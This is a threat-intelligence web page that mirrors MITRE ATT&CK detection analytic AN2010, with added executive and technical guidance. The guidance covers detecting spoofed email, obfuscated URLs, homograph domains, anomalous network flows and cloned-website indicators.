AN2010: Analytic 2010
Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[1][2] Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.[3]
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites, Mirrored from (victim URL) may be visible in the HTML section of packets.
Analyst context for executives and security teams
AN2010 is a detection analytic for early warning signs in email, browser, and network activity: unusual senders reaching many accounts, spoofed email headers, suspicious or obfuscated URLs, internationalized-domain homographs, anomalous network flows, and possible cloned-website indicators. For leaders, the value is validating whether the organization can see and triage common pre-compromise signals before users interact with deceptive infrastructure.
Executive priority
Prioritize this analytic as a readiness check for email security, web monitoring, and SOC correlation rather than as a single alert rule. The business question is whether security teams can prove they collect and analyze enough evidence to distinguish normal bulk mail and web access from spoofing, uncategorized or known-bad links, homograph domains, abnormal protocol behavior, and cloned-site artifacts. This supports resilience, incident decision-making, and compliance evidence around preventive and detective controls for inbound messaging and web traffic.
Technical view
SOC and detection teams should validate coverage across the supplied PRE platform context: email activity analysis, DKIM/SPF and header review, URL inspection with shortened-link expansion and obfuscation handling, browser log review for ASCII and internationalized-domain homographs, and network inspection for uncommon data flows or protocol deviations. Where available and permitted, correlate network patterns with process monitoring and command-line context to identify processes that do not normally initiate network communication. Tune around known legitimate bulk senders, marketing platforms, content delivery patterns, and expected encrypted traffic behavior.
Likely telemetry
- Email gateway or mail security logs showing sender, recipient counts, headers, DKIM/SPF results, and message metadata
- Message trace data identifying many accounts receiving mail from a single unusual or unknown sender
- URL inspection outputs, including expanded shortened links, obfuscated URL parsing, uncategorized site references, and known-bad site matches
- Browser logs or web security logs containing visited domains, including internationalized domain names and homograph-like domains
- Network flow records showing uncommon destinations, unusual process-to-network behavior, or first-seen network communication
Detection direction
- Validate that email detections can identify unusual sender-to-many-recipient patterns without overwhelming analysts with legitimate newsletters or business platforms.
- Confirm DKIM/SPF and header-analysis results are available to analysts and usable for spoofing triage; do not rely on display-name inspection alone.
- Test URL analysis against shortened, obfuscated, uncategorized, known-bad, and internationalized-domain examples to identify parser and normalization blind spots.
- Add review logic for homographs across browser and network telemetry, especially mixed character sets that visually resemble trusted domains.
- Baseline normal network communication by process so first-seen or unusual process-network activity can be triaged with context.
Mitigation priorities
- Start by ensuring email authentication and anti-spoofing controls are configured and producing reviewable evidence, especially DKIM/SPF and header-analysis outcomes.
- Strengthen mail and web inspection workflows for shortened links, obfuscated URLs, uncategorized domains, known-bad sites, and internationalized-domain handling.
- Maintain allowlists and baselines for known legitimate bulk senders and expected business web traffic to improve alert quality.
- Enable practical correlation between email, browser/web, network, process, and command-line telemetry for incident response handoff.
- Define escalation criteria for suspicious sender campaigns, homograph domains, cloned-site indicators, and anomalous protocol behavior so SOC teams know when to contain, block, or investigate further.
Analyst notes and limits
This object is an ATT&CK detection analytic, not a technique or adversary behavior description. Its value is strongest as a cross-control validation pattern spanning email security, URL analysis, browser/web logs, network inspection, and endpoint/process context. The external references support anti-spoofing, spoofed email mitigation, and URL obfuscation considerations.
No official detection field, tactics, labels, aliases, or relationship context were supplied. The object lists platform PRE only. Local environment baselines, approved bulk senders, inspection capabilities, privacy constraints, and available telemetry determine whether this analytic can be implemented effectively.
Analytic 2010
Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[1][2] Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.[3]
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites, Mirrored from (victim URL) may be visible in the HTML section of packets.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 82e525c2766c… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft Anti Spoofing
Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
Open source URL -
[2]
ACSC Email Spoofing
Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.
Open source URL -
[3]
Mandiant URL Obfuscation 2023
Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.
Open source URL -
[4]
mitre-attack AN2010Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.